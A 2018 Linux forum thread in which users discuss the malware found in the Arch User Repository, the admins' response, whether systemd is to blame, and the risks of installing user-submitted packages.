Author |
Message |
greengeek

Joined: 20 Jul 2010 Posts: 5624 Location: Republic of Novo Zelande
|
Posted: Wed 11 Jul 2018, 14:28 Post subject:
Arch User Repository compromised. Malware added |
|
The Arch User Repository has been compromised with the addition of some malware, as discussed here:
https://nakedsecurity.sophos.com/2018/07/11/another-linux-distro-poisoned-with-malware/
Seems as if the Arch admins are not overly concerned - basically stating that any repository can become contaminated and it is a case of "buyer beware - if you don't trust it don't install it."
Another timely reminder that adding new software (or allowing updates to previous software or system files) opens the door to increased risk.
|
Back to top
|
|
 |
spiritwild

Joined: 03 Oct 2016 Posts: 177
|
Posted: Wed 11 Jul 2018, 19:10 Post subject:
|
|
So..... Per the article, ARCH people think they are tech gods?
Is their response or lack of concern a display of arrogance or what?
|
Back to top
|
|
 |
8Geee

Joined: 12 May 2008 Posts: 2095 Location: N.E. USA
|
Posted: Wed 11 Jul 2018, 20:04 Post subject:
|
|
Wow, The admins have been compromised, too
_________________ Linux user #498913 "Some people need to reimagine their thinking."
"Zuckerberg: a large city inhabited by mentally challenged people."
|
Back to top
|
|
 |
anikin
Joined: 10 May 2012 Posts: 1020
|
Posted: Thu 12 Jul 2018, 07:05 Post subject:
|
|
What exactly has been compromised?
AUR (Arch User Repository) is an unsupported repository, where untrusted users publish their recipes/build scripts/PKGBUILD, like for example this one:
https://aur.archlinux.org/packages/palemoon/
https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=palemoon
There are no binaries there - only recipes. Embarrassing - yes. Compromised - hardly.
|
Back to top
|
|
 |
scsijon
Joined: 23 May 2007 Posts: 1536 Location: the australian mallee
|
Posted: Thu 12 Jul 2018, 19:23 Post subject:
|
|
Blame is being placed on systemd
quotes:
The aim of the modified lines in acroread was to use curl to download scripts from a remote site, and the script would (if it worked) reconfigure systemd to restart on a regular basis.
looks like systemd makes it easier for compromises - one platform (systemdOS) one payload…
and a "few" others.
Be carefull folks....
|
Back to top
|
|
 |
wiak
Joined: 11 Dec 2007 Posts: 1842 Location: not Bulgaria
|
Posted: Thu 12 Jul 2018, 19:28 Post subject:
|
|
scsijon wrote: | looks like systemd makes it easier for compromises - one platform (systemdOS) one payload. |
Perhaps, but I don't see how systemd components are easier to compromise than systeminit components - main security issue would seem to be that of the malware app user running it whilst having root user permissions surely?
In the Puppy Linux world, dotpets are put up here and there by anyone who feels fit. Only well-tested and wanted ones end up in official repositories, that's true but murga forum site isn't so much different from AUR, which is also for user recipes (EDIT: except that the murga forum is less secure since it includes binaries and more often quite complex shell-script apps, not just recipes).
wiak
|
Back to top
|
|
 |
spiritwild

Joined: 03 Oct 2016 Posts: 177
|
Posted: Thu 12 Jul 2018, 19:50 Post subject:
|
|
I remember, about 20 years ago on a nascar forum, someone thought they would open a file account and give all the users the name and password info in a public message.
I was blown away and I thought it was the worst idea on the entire planet. The internet had not been around that long so maybe people still felt safe in their little shell of fans. Coming from a BBS background it was the same as giving everyone on usenet my sysop password.
I made it known that I thought that was not a good Idea because of obvious reasons but my concerns fell on deaf ears.
When it was hacked and someone changed the password, They all blamed me. Because no one else on the whole damn planet would have though to walk through an open door and steal the goodies. Since I had concerns, I invited the crime to happen. I was amused.
Ah the good ol days.
|
Back to top
|
|
 |
|